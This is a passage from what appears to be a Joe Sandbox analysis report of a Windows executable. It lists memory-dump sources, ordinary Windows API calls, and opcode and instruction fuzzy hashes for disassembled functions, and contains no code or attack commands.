      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
      • String ID:
      • API String ID: 3587649625-0
      • Opcode ID: 31de71ccb13629eb4e8ff473cf0e989b9a8a473b909947ada8621b483159802c
      • Instruction ID: c503c1fa23d7140e46cc8ec188f4ac2cbf76225f0a379da995fd7466286e3532
      • Opcode Fuzzy Hash: 31de71ccb13629eb4e8ff473cf0e989b9a8a473b909947ada8621b483159802c
      • Instruction Fuzzy Hash: 7591C076A2C7A2D0EB11FB24D8401ADA761FB85799FD04131EA5C07AE9DFB8D581C350
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3668304517-0
      • Opcode ID: 402f2d810e1efc6a759daaa5297bed4678b331cbcfb426b8061d29b6a9ebee63
      • Instruction ID: 2432d4dfbaf6346630a72996cfb7b4d1d766df1ee88cca19262d00fcfb316ed0
      • Opcode Fuzzy Hash: 402f2d810e1efc6a759daaa5297bed4678b331cbcfb426b8061d29b6a9ebee63
      • Instruction Fuzzy Hash: 7B41A326F2C662C4FB01FB71D5402FD6321BF45B95F945235DE1D27A9ADEBC94818310
      APIs
      • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF741EA274D), ref: 00007FF741EA28A9
      • GetLastError.KERNEL32(?,00007FF741EA274D), ref: 00007FF741EA28B8
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ErrorFileLastPointer
      • String ID:
      • API String ID: 2976181284-0
      • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
      • Instruction ID: 3ac67473aa1b7381d82725bb95d0c06b9add902428bd6d2f475f2ebb71a5f827
      • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
      • Instruction Fuzzy Hash: 2F31C42AB1DA63C2EB627B2AD940674E351BF04BD6F840131FE1D27795DEBCD4428760
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Item_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 1746051919-0
      • Opcode ID: 8763c555b957396376e96df864685bb2527d49eefc22d4d720e740779d29c564
      • Instruction ID: 5c53528556b6c308a90d6efbb15912b32646eeb0a4eab0ad44776e9b808129d3
      • Opcode Fuzzy Hash: 8763c555b957396376e96df864685bb2527d49eefc22d4d720e740779d29c564
      • Instruction Fuzzy Hash: EA31B226A2C757C1EB12FB15E4443AAB360FB85B91F844231EA9C07B96EFBCE040C714
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: File$BuffersFlushTime
      • String ID:
      • API String ID: 1392018926-0
      • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
      • Instruction ID: 4a23594d49dbcb1a8b7c93c838f166b71ea563b8a41f4db8e3929c126463daec
      • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
      • Instruction Fuzzy Hash: A921AB2AB0DB63D6EB63BE11D4007BA9790BB017D6F954031DE4E16292EEBCD486C220
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: LoadString
      • String ID:
      • API String ID: 2948472770-0
      • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
      • Instruction ID: 57b7c8d5747453f95959519390f62041c3926a6d6dc858fa6e76711b0259a101
      • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
      • Instruction Fuzzy Hash: 8A113A79B0CB61D5EB02BB16A840169FBA1BB88FC1BD44935CE0D93720EEBCE5518754
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ErrorFileLastPointer
      • String ID:
      • API String ID: 2976181284-0
      • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
      • Instruction ID: fc647479852b559958cb786ea740ec92a39b04f277178437dba434a35da23a09
      • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
      • Instruction Fuzzy Hash: 5811D225B1C662C1FB25BB21E840279A360FB40BB5F984331DA3D222D5CFBCD582C310
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ItemRectTextWindow$Clientswprintf
      • String ID:
      • API String ID: 3322643685-0
      • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
      • Instruction ID: 6b960dc0f26a0531dc12aa2fb6666d423fc9d03ca86791a9ad6f99aa91ef73b9
      • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
      • Instruction Fuzzy Hash: 8C015228A1D36BC2FF5B7751A454279D3517F86B46FC80034DC4E0629AEEACE484C321
      APIs
      • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF741EAEBAD,?,?,?,?,00007FF741EA5752,?,?,?,00007FF741EA56DE), ref: 00007FF741EAEB5C
      • GetProcessAffinityMask.KERNEL32 ref: 00007FF741EAEB6F
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Process$AffinityCurrentMask
      • String ID:
      • API String ID: 1231390398-0
      • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
      • Instruction ID: 48bb6c33bd5b1ab8b34bceb73434c0e6ebcdc3981dc69a45f27835341e385845
      • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
      • Instruction Fuzzy Hash: 26E0E569B1854682DF1ABB55C4449A9A392BF88B40FC48035D60B83614DE2CE5498B10
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
      • String ID:
      • API String ID: 1173176844-0
      • Opcode ID: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
      • Instruction ID: 64b19ecb46feb75e367fcb9cfeb0d283c322f482854ad6031fdc36e68eb107a7
      • Opcode Fuzzy Hash: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
      • Instruction Fuzzy Hash: E3E0EC4CE1D12BC1FF2B32651C251B482906FA9772ED81730DA7E092C3BFACA591C130
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ErrorFreeHeapLast
      • String ID:
      • API String ID: 485612231-0
      • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
      • Instruction ID: e47b21ee04fd55ffac9aa77bf1852a3a15a76c5536f5179aeae2638d3af1822a
      • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
      • Instruction Fuzzy Hash: 14E04F58E4D153C2FF0B7BB25C051B492917F94756B880034C90D86252EFADD482D260
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3668304517-0
      • Opcode ID: db0f75601c8d953953658c1d14be6529ec917dbd1ad2d5887d518296e9f1c024
      • Instruction ID: 67220a873d5f1f7734c02e4f364a43f94450463a426cf03463d3c34e8baff031
      • Opcode Fuzzy Hash: db0f75601c8d953953658c1d14be6529ec917dbd1ad2d5887d518296e9f1c024
      • Instruction Fuzzy Hash: 3ED1996AB1C692D5EB2ABB35D6442BDF7A1FB06B85F840035CA1D077B5CF78E4618320
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: CompareString_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 1017591355-0
      • Opcode ID: fa91c3799828e3c7186940546e344b2356dc381c1e63a9425ea543ecc2eeea66
      • Instruction ID: d69032b70fa85797ca9e9e16e4796bf6b5b1d9ba29e3636ba3e362df1a052e20
      • Opcode Fuzzy Hash: fa91c3799828e3c7186940546e344b2356dc381c1e63a9425ea543ecc2eeea66
      • Instruction Fuzzy Hash: D9610459F0C667C1FB66BA25581427ED291BF81BD3FD44131EE4E06AC9EEECE4448230
      APIs
        • Part of subcall function 00007FF741EAE948: ReleaseSemaphore.KERNEL32 ref: 00007FF741EAE974
        • Part of subcall function 00007FF741EAE948: CloseHandle.KERNELBASE ref: 00007FF741EAE993
        • Part of subcall function 00007FF741EAE948: DeleteCriticalSection.KERNEL32 ref: 00007FF741EAE9AA
        • Part of subcall function 00007FF741EAE948: CloseHandle.KERNEL32 ref: 00007FF741EAE9B7
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB1ACB
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 904680172-0
      • Opcode ID: f81b05313dfd5b5a73717daa6d384c08c9459244a7d30a6ec5ae517113eafb45
      • Instruction ID: 1977c68514e4347180cb9debe1733e37ca3d10546d523e8495f959036eb9e6e5
      • Opcode Fuzzy Hash: f81b05313dfd5b5a73717daa6d384c08c9459244a7d30a6ec5ae517113eafb45
      • Instruction Fuzzy Hash: 7661F066B196A6D1EF09FB65E5440BCB365FB40FD1B944232D72D07AC6DFA9E460C300
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3668304517-0
      • Opcode ID: 80c6c1208725552e31fdb6002efde339e96468cf926a0bcef41ca708b735937a
      • Instruction ID: 6b624a32d70dbb922338cc0b3781f4eefed7d58673feffa2e4e50e091967e3d2
      • Opcode Fuzzy Hash: 80c6c1208725552e31fdb6002efde339e96468cf926a0bcef41ca708b735937a
      • Instruction Fuzzy Hash: 7151D36AB1C692D0EB16BB25D4443AAA751FB86BC5F840136EF4D07392DFBDE485C320
      APIs
        • Part of subcall function 00007FF741EA3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF741EB0811), ref: 00007FF741EA3EFD
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9E993
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: CloseFind_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 1011579015-0
      • Opcode ID: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
      • Instruction ID: 4c23b33d4b598a4d0c32eedc54ecf6967c609a09c289d5be075916b370498aa7
      • Opcode Fuzzy Hash: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
      • Instruction Fuzzy Hash: 49516226B1C6A6C1FB62BF64D44536EA361FB85B85F880136EB4D0B6A5DFACD441C320
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3668304517-0
      • Opcode ID: 9385cba53fa6208ca460e05f3a710e61ac95cb77221bf3bd1eb05f532c4ae120
      • Instruction ID: 66fe660cedf2e90c9430b5ca0b16c0d88acbd696dbe6ff001fc0c61ba23819db
      • Opcode Fuzzy Hash: 9385cba53fa6208ca460e05f3a710e61ac95cb77221bf3bd1eb05f532c4ae120
      • Instruction Fuzzy Hash: E841D666B1CAA182EB15BB17AA44379E251FB44FC1F888535EE5C0BF5ADFBCD4518300
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3668304517-0
      • Opcode ID: c12ddbc590a903591de313708f19a8cb728d3d3f41945339a7b2dbf0642da7e2
      • Instruction ID: 404b432d195010325c688b4c02dfa58f479d36b15292887037f5bbd17142d978
      • Opcode Fuzzy Hash: c12ddbc590a903591de313708f19a8cb728d3d3f41945339a7b2dbf0642da7e2
      • Instruction Fuzzy Hash: 9841F76AA0C712C1EF11BB25E685379A361FB85BD5F940134EA5D07799DFBDD440C220
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: HandleModule$AddressFreeLibraryProc
      • String ID:
      • API String ID: 3947729631-0
      • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
      • Instruction ID: 9b15e7129eb765a174a1f0431437c4646a73c6826c1790d96938f96c43751276
      • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
      • Instruction Fuzzy Hash: 8141F329B1C677C6FB16BB119C40138A260BF54B82FC44036EA0D076E1EFBDE842CB60
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
